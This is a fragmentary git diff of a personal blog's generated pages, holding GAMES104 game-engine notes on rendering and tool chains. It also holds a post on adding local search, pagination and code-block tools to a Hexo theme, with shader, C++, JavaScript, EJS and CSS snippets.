        }
    }
    // do something
}

Server State Snapshot Optimization

diff --git a/posts/GAMES104-Rendering/index.html b/posts/GAMES104-Rendering/index.html

Starting from a simple approximation: temporarily set aside the abstractions, i.e. radiosity, microfacets, BRDF, and so on.

Simple Light Solution


glLightfv(GL_LIGHT0, GL_AMBIENT, light_ambient);
glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse);
glLightfv(GL_LIGHT0, GL_SPECULAR, light_specular);
glLightfv(GL_LIGHT0, GL_POSITION, light_position);
          • Using simple light source as main light


void main()
{
    vec3 N = normalize(normal);
    vec3 V = normalize(camera_position - world_position);
    vec3 R = reflect(-V, N);
    FragColor = texture(cube_texture, R);
}

Early-stage exploration of image-based lighting.

Math Behind Light Combo

Shadow Map

Compute a shadow map, representing the shadow with a single texture.

// project our 3D position to the shadow map
vec4 proj_pos = shadow_viewproj * pos;
// from homogeneous space to clip space
vec2 shadow_uv = proj_pos.xy / proj_pos.w;
// from clip space to uv space
shadow_uv = shadow_uv * 0.5 + vec2(0.5);
// get point depth (from -1 to 1)
float real_depth = proj_pos.z / proj_pos.w;
// normalize from [-1..+1] to [0..+1]
real_depth = real_depth * 0.5 + 0.5;
// read depth from depth buffer in [0..+1]
float shadow_depth = texture(shadowmap, shadow_uv).x;
// compute final shadow factor by comparing
float shadow_factor = 1.0;
if (shadow_depth < real_depth)
    shadow_factor = 0.0;

            Problem of Shadow Map


            Resolution is limited on texture


// Geometry Term: geometry masking/shadowing due to microfacets
float GGX(float NdotV, float k) {
    return NdotV / (NdotV * (1.0 - k) + k);
}
float G_Smith(float NdotV, float NdotL, float roughness) {
    float k = pow(roughness + 1.0, 2.0) / 8.0;
    return GGX(NdotL, k) * GGX(NdotV, k);
}

Fresnel Equation

As the viewing angle approaches grazing, reflectance rises sharply.

$$f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}$$

$$F_{Schlick}(h,v,F_{0})=F_{0}+(1-F_{0})\left(1-(v\cdot h)\right)^{5}$$

The fifth power is a fit derived by mathematicians.

// Fresnel term with scalar optimization
float F_Schlick(float VoH, float f0) {
    float f = pow(1.0 - VoH, 5.0);
    return f0 + (1.0 - f0) * f;
}

            Physical Measured Material


            MERL BRDF Database of measured materials

Once the depth map for each cascade is ready, it can be used in the shadow rendering pass. Concretely, for every pixel that receives shadows, its depth in each cascade's depth map is computed from its world-space position and the light's view; comparing that value against the depth stored in the corresponding cascade map then determines whether the pixel is in shadow.

splitFrustumToSubfrusta();
calculateOrthoProjectionsForEachSubfrustum();
renderShadowMapForEachSubfrustum();
renderScene();

vs_main() {
    calculateWorldPosition()
}

ps_main() {
    transformWorldPositionsForEachProjections()
    sampleAllShadowMaps()
    compareDepthAndLightingPixel()
    ...
}

Blend between Cascade Layers

Uber Shader

Compiled into many short shader variants through predefined macros.

// sky light
#if ENABLE_SKY_LIGHT
#if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
    if (NoL == 0) {
#endif

#if MATERIAL_SHADINGMODEL_SINGLELAYERWATER
    ShadingModelContext.WaterDiffuseIndirectLuminance += SkyDiffuseLighting;
#endif

    Color += SkyDiffuseLighting * half3(ResolvedView.SkylightColor.rgb) * ShadingModelContext.DiffuseColor * MaterialAO;
#if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
    }
#endif
#endif

Shader Variants Example in a Real Game

Terrain Material

Simple Texture Splatting

float3 blend(float4 texture1, float a1, float4 texture2, float a2) {
    return texture1.rgb * a1 + texture2.rgb * a2;
}

When one terrain texture transitions into another, simple blending looks smooth but unnatural.

Advanced Texture Splatting

float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
    return height1 > height2 ? texture1.rgb : texture2.rgb;
}

Transition between materials according to the height map.

Advanced Texture Splatting - Biased

Introduce a height bias.

float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
    float depth = 0.2;
    float ma = max(texture1.a + height1, texture2.a + height2) - depth;
    float b1 = max(texture1.a + height1 - ma, 0);
    float b2 = max(texture2.a + height2 - ma, 0);
    return (texture1.rgb * b1 + texture2.rgb * b2) / (b1 + b2);
}

Sampling from Material Texture Array

FXAA (Fast Approximate Anti-Aliasing)

// M: luminance of the middle pixel
// (L = 0.299 * R + 0.587 * G + 0.114 * B)

#define MinThreshold 0.05

float MaxLuma = max(N, E, W, S, M);
float MinLuma = min(N, E, W, S, M);
float Contrast = MaxLuma - MinLuma;
if (Contrast >= MinThreshold)
    ...

Anti-aliasing based on the 1x rendered image.


float threshold;
float4 computeHighlightArea()
{
    [...] // first do normal lighting calculations and output results
    float4 scene_color = float4(lighting, 1.0f);
    // check whether fragment output is higher than threshold; if so, output as highlight color
    float luminance = dot(scene_color.rgb, vec3(0.2126f, 0.7152f, 0.0722f));

    float4 highlight_color = float4(0.0f, 0.0f, 0.0f, 1.0f);
    if (luminance > threshold)
        highlight_color = float4(scene_color.rgb, 1.0f);
    return highlight_color;
}

Gaussian Blur

Gaussian blur convolves the image with a kernel drawn from a 2D normal distribution; a sketch of building such a kernel follows.
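A minimal sketch of building a 1D Gaussian kernel; because the 2D Gaussian is separable, blurring with this kernel horizontally and then vertically equals a single pass with the full 2D kernel, at much lower cost. The function name is illustrative:

#include <cmath>
#include <vector>

std::vector<float> gaussianKernel1D(int radius, float sigma) {
    std::vector<float> k(2 * radius + 1);
    float sum = 0.0f;
    for (int i = -radius; i <= radius; ++i) {
        // unnormalized Gaussian weight exp(-x^2 / (2 sigma^2))
        k[i + radius] = std::exp(-(float)(i * i) / (2.0f * sigma * sigma));
        sum += k[i + radius];
    }
    for (float& w : k) w /= sum;  // normalize so the weights sum to 1
    return k;
}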

Tone Mapping

Tone Mapping Curve

float3 F(float3 x)
{
    const float A = 0.22f;
    const float B = 0.30f;
    const float C = 0.10f;
    const float D = 0.20f;
    const float E = 0.01f;
    const float F = 0.30f;
    return ((x * (A * x + C * B) + D * E) / (x * (A * x + B) + D * F)) - E / F;
}

float3 Uncharted2ToneMapping(float3 color, float adapted_lum)
{
    const float WHITE = 11.2f;
    return F(1.6f * adapted_lum * color) / F(WHITE);
}
            • Get a filmic look without making renders dirty

Rendering Pipeline

Forward Rendering

for n meshes
    for m lights
        color += shading(mesh, light)

Render in order, mesh by mesh and light by light.

            Sort and Render Transparent after Opaque Objects

diff --git a/posts/GAMES104-Tool Chains/index.html b/posts/GAMES104-Tool Chains/index.html

            Immediate Mode

Data describing the rendering primitives is pushed from the client into the command list every frame.

Imgui::DrawButton("hello", 12, 24, &callback_func);

Characteristics

Retained Mode

Client calls to the graphics library do not directly cause rendering; instead they build up a large set of indirect resources managed by the library.

HorizontalLayout layout = new HorizontalLayout();
Button button = new Button();
button.setText("Hello!");
button.setWidth(12);
button.setHeight(24);
button.setCallback(&callback_func);
layout.Add(button);

Characteristics


        Endianness

        Unreal:

/**
Returns true if data larger than 1 byte should be swapped to deal with endian mismatches.
*/
FORCEINLINE bool IsByteSwapping()
{
#if PLATFORM_LITTLE_ENDIAN
    bool SwapBytes = ArForceByteSwapping;
#else
    bool SwapBytes = this->IsPersistent();
#endif
    return SwapBytes;
}
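
Concretely, "swapping" reverses the byte order of multi-byte values; a portable sketch (std::byteswap exists in C++23; a manual version is shown here for illustration):

#include <cstdint>

// Reverse the byte order of a 32-bit value, e.g. when an asset was
// saved big-endian but is being loaded on a little-endian host.
inline std::uint32_t SwapBytes32(std::uint32_t v)
{
    return ((v & 0x000000FFu) << 24) |
           ((v & 0x0000FF00u) <<  8) |
           ((v & 0x00FF0000u) >>  8) |
           ((v & 0xFF000000u) >> 24);
}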

        Asset Version Compatibility


        webp

        Add or Remove Field


original class:

class GameObject
{
private:
    GUID guid;
    string name;
    Transform transform;
};

        old data:

{
    "guid": "092xtwg2u4ik1359",
    "name": "Alice",
    "transform": {
        "position": {
            "x": 0,
            "y": 0,
            "z": -0.1
        },
        "rotate": {},
        "scale": {
            "x": 1,
            "y": 1,
            "z": 1
        }
    }
}

        updated class 1

class GameObject
{
private:
    GUID guid;
    string name;
};

        updated class 2

class GameObject {
private:
    GUID guid;
    string name;
    Transform transform;
    BoundingBox bbox;
};

        Solve Compatibility by Version Hardcode


        Unreal: add version to asset

        @@ -917,7 +915,7 @@

class GameObject:
    int x = default;
    float y = default;
    bool z = default; // new field

    function Deserialize(data):
        x = data.GetValue<int>("x");
        y = data.GetValue<float>("y");
        if (GetCurrentVersion() >= data.version) {
            z = data.GetValue<bool>("z");
        }

    function Serialize(data):
        data.SetValue<int>("x", x);
        data.SetValue<float>("y", y);
        data.SetValue<bool>("z", z);
        data.UpdateVersion(GetCurrentVersion());

        Solve Compatibility by Field UID


        Google protocol buffers:

        @@ -958,7 +956,7 @@

message PrefabObjectBinary {
    string guid = 1;
    string file_name = 2;
    repeated string game_object_guid_list = 3;
}
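
To see why per-field UIDs buy compatibility, here is a minimal hand-rolled sketch (my illustration, not protobuf's real wire format): readers keep the fields whose UID they know and silently skip the rest, so adding or removing fields breaks neither old nor new readers.

#include <cstdint>
#include <map>
#include <vector>

// A toy tagged format: each field is (uid, raw bytes).
struct Field { std::uint32_t uid; std::vector<std::uint8_t> bytes; };

// Keep only the fields this reader understands; unknown UIDs are skipped.
std::map<std::uint32_t, std::vector<std::uint8_t>>
DecodeKnownFields(const std::vector<Field>& fields,
                  const std::vector<std::uint32_t>& known_uids)
{
    std::map<std::uint32_t, std::vector<std::uint8_t>> out;
    for (const Field& f : fields) {
        for (std::uint32_t uid : known_uids) {
            if (f.uid == uid) { out[f.uid] = f.bytes; break; }
        }
        // unknown uid: silently skipped, data stays compatible
    }
    return out;
}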

        webp

How to Make Robust Tools


        @@ -991,7 +989,7 @@

Command-Definition

Every system that wants to support undo/redo/crash recovery needs to implement system-specific commands inheriting from ICommand<TData>.

public interface ICommand<TData>
{
    long UID { get; set; }
    TData Data { get; set; }
    void Invoke();
    void Revoke();
    byte[] Serialize();
    void Deserialize(byte[] data);
}

      Command-UID

Commands need to strictly follow their original sequence when recovering from disk.
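
A minimal sketch of one way to get that ordering (assumed names, not the actual engine code): issue UIDs from a monotonic counter and sort by UID before replay.

#include <algorithm>
#include <atomic>
#include <cstdint>
#include <vector>

// Issue strictly increasing UIDs so command order is total,
// even when commands are created from multiple threads.
std::uint64_t NextCommandUid()
{
    static std::atomic<std::uint64_t> counter{0};
    return ++counter;
}

struct CommandRecord { std::uint64_t uid; /* serialized payload ... */ };

// On crash recovery, replay commands in UID order.
void SortForReplay(std::vector<CommandRecord>& records)
{
    std::sort(records.begin(), records.end(),
              [](const CommandRecord& a, const CommandRecord& b) {
                  return a.uid < b.uid;
              });
}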

      @@ -1152,7 +1150,7 @@

      Schema-Inherit

      Abstraction of the inheritance relationship of the world


      webp

class A {/*...*/};
class B : A {/*...*/};
class C : A {/*...*/};

      Schema-Data Reference

Abstraction of the reference relationships of the world

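As an illustrative sketch (assumed types, not the lecture's schema), references can be stored as GUIDs rather than raw pointers, so the link survives serialization:

#include <string>

// Hypothetical sketch: a schema field that references another asset
// by GUID instead of by pointer; resolved to a pointer at load time.
struct AssetRef {
    std::string guid;  // stable identity of the referenced asset
};

struct MeshComponentSchema {
    AssetRef mesh;
    AssetRef material;
};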

      @@ -1234,7 +1232,7 @@

      Runtime View

Computed at higher speed.

class RuntimeSpotlight
{
public:
    // Spot light translation matrix
    Matrix4x4 light_trans {Matrix4x4::IDENTITY};
    // Spot light cone
    float inner_cone_radian = 0.0f;
    float outer_cone_radian = 0.0f;
    // Spot light intensity and units
    float intensity = 0.0f;
    LightUnits unit = CANDELA;
    // Spot light color
    Vector4 light_color {Vector4::ZERO};
    // other light data like shadow...
};

    Storage View

    Focus:


    @@ -1248,7 +1246,7 @@

    Storage View

Takes up less disk space.

"Position:X": 1.0,
"Position:Y": 1.0,
"Position:Z": 1.0,
"Rotation:X": 0.0,
"Rotation:Y": 0.0,
"Rotation:Z": 0.0,
"Rotation:W": 1.0,
"Scale:X": 1.0,
"Scale:Y": 1.0,
"Scale:Z": 1.0,
// cone degree
"inner_cone_degree": 30,
"outer_cone_degree": 60,
// intensity and unit
"intensity": 0.0,
"unit": 1
// other data...
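
The two views meet at load time; a small sketch of the conversion, using the assumed field names from the snippets above:

#include <cmath>

// Hypothetical load-time conversion from the storage view (degrees,
// compact on disk) to the runtime view (radians, fast to use).
inline float DegreesToRadians(float degrees)
{
    return degrees * 3.14159265358979f / 180.0f;
}

// runtime.inner_cone_radian = DegreesToRadians(storage.inner_cone_degree);
// runtime.outer_cone_radian = DegreesToRadians(storage.outer_cone_degree);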

    Tools View

    webp

    Focus:

    @@ -2005,16 +2003,16 @@

Visual Script

Visual programming systems, such as Blueprints.

Hard-Code Method for More Features

Hard-coded methods enable more features, but the code also gets more complex.

class Human : public Object {
    void Jump() {
        // do something ...
    }
    void StopJump() {
        // do something ...
    }
};

void CallFunction(Object* instance, string type_name, string func_name)
{
    if (type_name == "Human") {
        Human* human = (Human*)instance;
        if (func_name == "Jump") {
            human->Jump();
        }
        else if (func_name == "StopJump") {
            human->StopJump();
        }
    }
}

    A Common Solution - Reflection


    In computer science, reflective programming or reflection is the ability of a process to examine, introspect and modify its own structure and behavior.


Modern high-level programming languages all have reflection built into their design.

Java Reflection

package Demo;
public class Test {
    public int m_field;
    public void print()
    {
        System.out.print("call print().");
    }
}

package Demo;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
public class Demo {
    public static void main(String[] args) throws Exception {
        Class<?> cls = Class.forName("Demo.Test");
        Object obj = cls.getConstructor().newInstance();
        Field field_accessor = cls.getField("m_field");
        field_accessor.set(obj, 2);

        Method method_accessor = cls.getMethod("print");
        method_accessor.invoke(obj);
    }
}

    Reflection Build the Bridge between Code and Tools


    Using reflection to generate a code meta information map

    @@ -2028,8 +2026,8 @@

    class Human: public Object {
    void Jump() {
    // do something ...
    }

    void StopJump() {
    // do something ...
    }
    }
void callFunction(Object* instance, string type_name, string func_name)
{
    FunctionPtr function_ptr = FunctionInfoMap::getInvokeFunction(instance, type_name, func_name);
    function_ptr->invoke();
}

    How to Implement Reflection in C++

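The core idea is a registry built from generated meta information; a minimal hand-written sketch (an assumed design, not any specific engine's implementation):

#include <functional>
#include <map>
#include <string>

// Minimal hand-rolled reflection: map "Type::Method" names to
// type-erased callables registered at startup.
class FunctionRegistry {
public:
    using Method = std::function<void(void*)>;

    static FunctionRegistry& Get() {
        static FunctionRegistry instance;
        return instance;
    }

    void Register(const std::string& type_name, const std::string& func_name, Method m) {
        methods_[type_name + "::" + func_name] = std::move(m);
    }

    void Invoke(void* instance, const std::string& type_name, const std::string& func_name) {
        auto it = methods_.find(type_name + "::" + func_name);
        if (it != methods_.end()) it->second(instance);
    }

private:
    std::map<std::string, Method> methods_;
};

// Usage sketch:
// FunctionRegistry::Get().Register("Human", "Jump",
//     [](void* p) { static_cast<Human*>(p)->Jump(); });
// FunctionRegistry::Get().Invoke(human_ptr, "Human", "Jump");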

      @@ -6443,6 +6441,8 @@

      目录

var highlightShrink = ""; var HighlightHeightLimit = "";
+
+
diff --git "a/posts/Game-\347\273\231\350\246\201\345\205\263\351\227\250\347\232\204\347\202\211\347\237\263\344\270\212\344\270\252\351\246\231/index.html" "b/posts/Game-\347\273\231\350\246\201\345\205\263\351\227\250\347\232\204\347\202\211\347\237\263\344\270\212\344\270\252\351\246\231/index.html"
index 36c029f306..0107740c98 100644
--- "a/posts/Game-\347\273\231\350\246\201\345\205\263\351\227\250\347\232\204\347\202\211\347\237\263\344\270\212\344\270\252\351\246\231/index.html"
+++ "b/posts/Game-\347\273\231\350\246\201\345\205\263\351\227\250\347\232\204\347\202\211\347\237\263\344\270\212\344\270\252\351\246\231/index.html"
@@ -51,8 +51,6 @@
-
-
@@ -408,12 +406,12 @@

      Game-给要关门的炉石上个香

The core is the search.js below, hacked up a bit:

    // search.js
    // A local search script with the help of hexo-generator-search
    // Copyright (C) 2015
    // Joseph Pan <http://github.com/wzpan>
    // Shuhao Mao <http://github.com/maoshuhao>
    // This library is free software; you can redistribute it and/or modify
    // it under the terms of the GNU Lesser General Public License as
    // published by the Free Software Foundation; either version 2.1 of the
    // License, or (at your option) any later version.
    //
    // This library is distributed in the hope that it will be useful, but
    // WITHOUT ANY WARRANTY; without even the implied warranty of
    // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
    // Lesser General Public License for more details.
    //
    // You should have received a copy of the GNU Lesser General Public
    // License along with this library; if not, write to the Free Software
    // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    // 02110-1301 USA

    var searchFunc = function (path, search_id, content_id, match_count_id) {
    $.ajax({
    url: path,
    dataType: "xml",
    success: function (xmlResponse) {
    // get the contents from search data
    var datas = $("entry", xmlResponse).map(function () {
    return {
    title: $("title", this).text(),
    content: $("content", this).text(),
    url: $("url", this).text()
    };
    }).get();
    var $input = document.getElementById(search_id);
    var $resultContent = document.getElementById(content_id);
    $input.addEventListener('input', function () {
    var str = '<ul class=\"search-result-list\">';
    var keywords = this.value.trim().split(/[\s\-]+/); // .toLowerCase().split(/[\s\-]+/);
    $resultContent.innerHTML = "";
    if (this.value.trim().length <= 0) {
    document.getElementById(match_count_id).textContent = "";
    return;
    }
    // perform local searching
    datas.forEach(function (data) {
    var isMatch = true;
    if (!data.title || data.title.trim() === '') {
    data.title = "Untitled";
    }
    var data_title = data.title.trim();//.toLowerCase();
    var data_content = data.content.trim().replace(/<[^>]+>/g, "");//.toLowerCase();
    var data_url = data.url;
    var index_title = -1;
    var index_content = -1;
    var first_occur = -1;
// only match articles with non-empty contents
    if (data_content !== '') {
    keywords.forEach(function (keyword, i) {
    index_title = data_title.indexOf(keyword);
    index_content = data_content.indexOf(keyword);

    if (index_title < 0 && index_content < 0) {
    isMatch = false;
    } else {
    if (index_content < 0) {
    index_content = 0;
    }
    if (i == 0) {
    first_occur = index_content;
    }
    // content_index.push({index_content:index_content, keyword_len:keyword_len});
    }
    });
    } else {
    isMatch = false;
    }
    // show search results
    if (isMatch) {
    str += "<li><a href='" + data_url +
    "' class='search-result-title'>" + data_title + "</a>";
    var content = data.content.trim().replace(/<[^>]+>/g, "");
    if (first_occur >= 0) {
    // cut out 100 characters
    var start = first_occur - 20;
    var end = first_occur + 80;
    if (start < 0) {
    start = 0;
    }
    if (start == 0) {
    end = 100;
    }
    if (end > content.length) {
    end = content.length;
    }
var match_content = content.substring(start, end); // substring(start, end), not substr(start, length)
    // highlight all keywords
    keywords.forEach(function (keyword) {
    var regS = new RegExp(keyword, "gi");
    match_content = match_content.replace(regS,
    "<em class=\"search-keyword\">" +
    keyword + "</em>");
    });
    str += "<p class=\"search-result\">" + match_content +
    "...</p>"
    }
    str += "</li>";
    }
    });
    str += "</ul>";
    if (str.indexOf('<li>') === -1) {
    document.getElementById(match_count_id).textContent = "";
    return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容,更换下搜索词试试吧~<span></ul>";
    }
    else
    {
    document.getElementById(match_count_id).innerHTML = "匹配到 <b><font size=\"5px\"><font color=\"#424242\">" + str.match(/<li>/g).length + "</font></font></b> 个结果。";
    }
    $resultContent.innerHTML = str;
    });
    }
    });
    }

Roughly, it reads the contents of the search_id input box, searches the index at path (./search.xml), and appends the matched entries and the match count, as lists, into content_id and match_count_id respectively.

Front end

search.ejs

OK, that's the back end; next, write the front end, search.ejs:

    <div class="page-header">
    <div class="search-dialog">
    <span id="local-search" class="local-search local-search-plugin">
    <h2>站内搜索</h2>
    <div class="local-search-input-box">
    <img class="search_icon" src="<%- theme.icon.search %>" />
    <input type="search" placeholder="输入关键字以搜索……" id="local-search-input" class="local-search-input-cls" />
    </div>
    <div id="local-search-result" class="local-search-result-cls"></div>
    <hr></hr>
    <p id="local-search-match-count" class="local-search-match-count"></p>
    </span>
    </div>
    <script>
    if ($('.local-search').size()) {
    $.getScript('/js/search.js', function () {
    searchFunc('/search.xml', 'local-search-input', 'local-search-result', 'local-search-match-count')
    })
    }
    </script>
    </div>

    search.css

Lay out the styles in search.css:

    .page-header{
    display: flex;
align-items: center; /* vertically center child elements */
    }
    .local-search {
    position: relative;
    text-align: left;
    display: grid;
    }
    .local-search-input-box {
    display: flex;
    height: 24px;
    margin: 20px 10px 0 10px;
    padding: 4px 12px;
    border-radius: 20px;
    border: 2px solid #898fa0;
    color: #666;
    font-size: 14px;
align-items: center; /* vertically center child elements */
    }
    .local-search-input-cls {
    width: 100%;
    /* margin: 10px 0; */
    color: #12183A;
    font-size: 16px;
    padding-left: 0.6em;
    border: none;
    outline:none;
    }
    a.search-result-title {
    display: flow !important;
    width: auto !important;
    height: auto !important;
    margin-left: 0 !important;
    }
    .local-search-result-cls {
    overflow-y: overlay;
    max-height: calc(80vh - 200px);
    width: 100%;
    margin: 20px 0;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls {
    margin: 20px 10px;
    }
    }
    .local-search-empty {
    color: #888;
    line-height: 44px;
    text-align: center;
    display: block;
    font-size: 18px;
    font-weight: 400;
    }
    .local-search-result-cls ul {
    min-width: 400px;
    max-width: 900px;
    max-height: 600px;
    min-height: 0;
    height: auto;
    margin: 15px 5px 15px 20px;
    padding-right: 30px;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls ul {
    min-width: auto;
    max-width: max-content;
    max-height: 70vh;
    min-height: auto;
    padding: 0 10px 10px 10px 10px;
    }
    }
    .local-search-result-cls ul li {
    text-align: left;
    border-bottom: 1px solid #bdb7b7;
    padding-bottom: 10px;
    margin-bottom: 20px;
    line-height: 30px;
    font-weight: 400;
    }
    .local-search-result-cls ul li:last-child {
    border-bottom: none;
    margin-bottom: 0;
    }
    .local-search-result-cls ul li a {
    margin-top: 20px;
    font-size: 18px;
    text-decoration: none;
    transition: all .3s;
    font-weight: bold;
    color: #12183A;
    }
    .local-search-result-cls ul li a:hover {
    text-decoration:underline;
    }
    .local-search-result-cls ul li p {
    margin-top: 10px;
    font-size: 14px;
    max-height: 124px;
    overflow: hidden;
    }
    .local-search-result-cls ul li em.search-keyword {
    color: #00F;
    font-weight:bold;
    font-style: normal;
    }

    .search_icon{
    width: 14px;
    height: 14px;
    }
    .search-dialog {
    display: block;
    padding: 64px 80px 20px 80px;
    width: 100%;
align-items: center; /* vertically center child elements */
    margin: 0 0 20px;
    }
    @media screen and (max-width: 800px) {
    .search-dialog {
    box-sizing: border-box;
    top: 0;
    left: 0;
    margin: 0;
    width: 100%;
    height: 100%;
    border-radius: 0;
    padding: 50px 15px 20px 15px;
    }
    }
    .local-search-match-count{
    padding: 20px 20px 0 20px;
    color: #12183A;
    }
    .search-dialog h2{
    display: inline-block;
    width: 100%;
    margin-bottom: 20px;
    color: #424242;
    font-size: 1.7rem;
    }
    .search-close-button:hover {
    filter: brightness(120%);
    }
    #local-search .search-dialog .local-search-box {
    margin: 0 auto;
    max-width: 100%;
    width: 100%;
    }
    .custom-hr, .search-dialog hr {
    position: relative;
    margin: 0 auto;
    border: 1px dashed #bdb7b7;
    width: calc(100% - 4px);
    }
    input[type="search"]::-webkit-search-cancel-button {
    -webkit-appearance: none;
    height: 10px;
    width: 10px;
    background: url(/images/close.png) no-repeat;
    background-size: contain;
    }
    input[type="search"]::-webkit-search-cancel-button:hover {
    filter: brightness(120%);
    }

Deployment

Import the CSS in index.less:

@import "./plugin/search.css";

I placed this search module on the statistics page, just before the grouping section; it looks decent. A switch then controls whether the feature is enabled.

<% if(theme.search && is_archive()) { %>
<%- partial('_widget/search') %>
<% } %>

Demo

Locally, results show up instantly; once deployed it gets rather laggy, and mashing random input can even crash it. Tried it on a phone and it failed to load... I really do ramble too much.

    png

    @@ -515,10 +513,10 @@

Methodology

Code

home.ejs

Modify home.ejs:

    <div class="change-page">
    <div class="change-page">
<% if(page.prev !== 0 && theme.pagination !== 1){ // previous page %>
    <div class="page">
    <a href="<%- url_for(page.prev_link) %>">
    <div class="box">
    &#60;
    </div>
    </a>
    </div>
    <% } %>
    <% if (page.current > theme.pagination + 1) { %>
    <div class="page">
    <a href="<%- url_for('/') %>">
    <div class="box">1
    </div>
    </a>
    </div>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <% } %>
    <% for(var i = page.current - theme.pagination; i <= page.current + theme.pagination; i++){ %>
    <% if(i >= 1 && i <= page.total){ %>
    <% if(i === page.current){ %>
    <div class="page">
    <div class="box">
    <%= i %>
    </div>
    </div>
    <% } else { %>
    <div class="page">
    <a href="<%- i=== 1 ? '/' : url_for('/page/' + i + '/') %>">
    <div class="box">
    <%= i %>
    </div>
    </a>
    </div>
    <% } %>
    <% } %>
    <% } %>
    <% if (page.total - page.current > theme.pagination) { %>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <div class="page">
    <a href="<%- page.total === 1 ? '/' : url_for('/page/' + page.total + '/') %> %>">
    <div class="box">
    <%= page.total %>
    </div>
    </a>
    </div>
    <% } %>
    <% if(page.next !==0 && theme.pagination !== 1){ %>
    <div class="page">
    <a href="<%- url_for(page.next_link) %>">
    <div class="box">
    &#62;
    </div>
    </a>
    </div>
    <% } %>
    </div>
    </div>

    home.less

Then adjust home.less:

    .change-page {
    display: inline;
    color: #FFF;
    .box {
    background: #006AFF;
    width: 40px;
    height: 40px;
    line-height: 40px;
    border-radius: 10px;
    margin: 8px;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.1);
    }
    .ellipsis
    {
    .box {
    background: #fff;
    color: #898FA0;
    }
    }
    .page {
    display: inline-block;
    a {
    color: @textColorTheme;
    text-decoration: none;
    .box {
    background: #fff;
    color: #898FA0;
    }
    .box:hover {
    margin-top: -15px;
    cursor: pointer;
    }
    }
    }
    }

Demo

png

Pagination can now jump not only to the previous and next page, but also to the first page, the last page, and the pages around the current one; when those nearby pages are not contiguous with the first or last page, an ellipsis is inserted.

    @@ -530,10 +528,10 @@

Code

home.ejs

In home.ejs, find post-block-content-info and add code that displays post.description:

<span class="post-block-content-info-description">
<%= post.description %>
</span>

    home.less

Tweak the styles in home.less:

.post-card-description {
padding: 10px 16px;
text-align: right;
flex-grow: 1;
font-size: 14px;
font-weight: 500;
line-height: 36px;
color: #999;
}

Demo

Final demo:

    png

    @@ -550,10 +548,10 @@

highlight_tools

This way of writing the code feels a bit unpolished, but it'll do for now!

<%- js('js/widget/highlight_tools.js') %>
<script>
var codeBlocks = document.querySelectorAll('pre');
createHighlightTools(codeBlocks, "<%= theme.icon.copy %>", "<%= theme.icon.close_code_block %>", "<%= page.highlight_shrink %>", "<%= page.highlight_height_limit %>"); // call the function with its parameters
</script>

    highlight_tools.js

    function createHighlightTools()
function createHighlightTools(codeBlocks, copyIcon, closeCodeBlockIcon, highlightShrink, HighlightHeightLimit) {
codeBlocks.forEach(function (codeBlock) {
if (!codeBlock.querySelector('code'))
return;
var container = createContainer(codeBlock);
createCopyButton(container, codeBlock, copyIcon);
createCodeLangText(container, codeBlock);
createCloseCodeBlockButton(container, codeBlock, closeCodeBlockIcon, highlightShrink);
setHighlightHeightLimit(codeBlock, HighlightHeightLimit);
});
}

First check whether this <pre> actually has a <code> child element, to avoid false positives.

• createContainer() wraps a layer above the code block to hold the UI.

@@ -565,7 +563,7 @@
      function createContainer()
function createContainer(codeBlock) {
// create the container element that wraps the code block and buttons
var container = document.createElement('div');
container.className = 'hightlight-tools';
// insert the container element before the code block
codeBlock.parentNode.insertBefore(container, codeBlock);
return container;
}

With this, a <div class="hightlight-tools"> element appears above each code block:

      png

      function createCopyButton()
      @@ -573,21 +571,21 @@
Reference: 添加 CopyCode(复制代码)功能 - 腾讯云开发者社区 (tencent.com)
function createCopyButton(container, codeBlock, icon) {
var button = document.createElement('button');
button.className = 'copy-button';
button.type = 'button';
button.title = 'copy-button';
button.style.backgroundImage = 'url("' + icon + '")';
// add the button to the container element
container.appendChild(button);
// create the notice text: a <span> element
var span = document.createElement('span');
span.textContent = "已复制";
// add the class name
span.className = 'copy-notice';
// add the text to the container element
container.appendChild(span);

button.addEventListener('click', function () {
// get the code block's text content, including line breaks
var code = codeBlock.innerText;
// create a temporary textarea element and set the code block's content as its value
var textarea = document.createElement('textarea');
textarea.value = code;
// append the textarea element to the body
document.body.appendChild(textarea);
// select the text in the textarea
textarea.select();
// execute the copy operation
document.execCommand('copy');
// remove the temporary textarea element
document.body.removeChild(textarea);
// show the "copied" notice
span.style.opacity = 1;
// set the notice's opacity back to 0 after 1 second
setTimeout(function () {
span.style.opacity = 0;
}, 1000);
});
}

The original article fetched the code content with var code = codeBlock.textContent;, but that discards line breaks; it should be var code = codeBlock.innerText; instead.

It also adds the "已复制" ("copied") notice text.

    function createCodeLangText()
function createCodeLangText(container, codeBlock) {
// create the notice text: a <span> element
var span = document.createElement('span');
span.textContent = codeBlock.querySelector('.hljs').classList.value.replace('hljs ', '').toUpperCase(); // code language
if (span.textContent === 'EBNF')
span.textContent = '';
// add the class name
span.className = 'code-lang';
// add the text to the container element
container.appendChild(span);
}

The other class name on the hljs element is the code language. If no language is set in the Markdown, the block is rendered with an ebnf class, which is replaced with an empty string.

    function createCloseCodeBlockButton()
function createCloseCodeBlockButton(container, codeBlock, icon, highlight_shrink)
{
var button = document.createElement('button');
button.className = 'close-code-block-button';
button.type = 'button';
button.title = 'close-code-block-button';
button.style.backgroundImage = 'url("' + icon + '")';
// add the button to the container element
container.appendChild(button);
if (Boolean(highlight_shrink))
{
var hljs = codeBlock.querySelector('.hljs');
button.style.transform = "rotate(-90deg)";
hljs.classList.add("closed");
}
button.addEventListener('click', function () {
var hljs = codeBlock.querySelector('.hljs');
if (!hljs.classList.contains('closed')) {
button.style.transform = "rotate(-90deg)";
hljs.classList.add("closed");
} else {
button.style.transform = "rotate(0deg)";
hljs.classList.remove("closed");
}
});
}

